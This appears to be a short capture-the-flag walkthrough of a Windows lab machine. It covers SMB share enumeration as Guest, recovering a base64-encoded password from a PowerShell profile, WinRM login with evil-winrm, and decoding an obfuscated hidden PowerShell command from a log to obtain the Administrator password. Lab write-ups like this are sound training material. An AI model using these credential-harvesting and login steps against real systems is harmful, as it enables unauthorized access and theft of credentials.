Enumeration
$ smbmap -u Guest -H 192.168.192.152
Scripts$ READ ONLY
Users$ READ ONLY
$ smbclient \\\\192.168.192.152\\Scripts$ -U Guest
$ smbclient \\\\192.168.192.152\\Users$ -U Guest
Users: administrator, scripting
smb: \scripting\Documents\WindowsPowerShell\> get profile.ps1
This file contains base64 encoded password.
$password = ConvertTo-SecureString "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('[REDACTEDBASE64ENCODED]')))" -AsPlainText -Force
Initial Access
$ evil-winrm -u scripting -p [REDACTED] -i 192.168.192.152
PrivEsc
There is log file. We can see the base64 encoded string.
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc JABPAHcAbgBlAGQAIAA9ACAAQAAoACkAOwAkAE8AdwBuAGUAZAAgACsAPQAgAHsAJABEAGUAYwBvAGQAZQBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2A...
We should decode this long part.
They obfuscated it. We have to solve it.
We eliminated unnecessary parts of it. We broke down the script to:
$Decoded = [System.Convert]::FromBase64String("[REDACTEDBASE64ENCODED]")
$ms = (New-Object System.IO.MemoryStream($Decoded,0,$Decoded.Length))
(New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))).readtoend()
Execute these commands respectively. It will give the password.
$ evil-winrm -u Administrator -p [REDACTED] -i 192.168.192.152
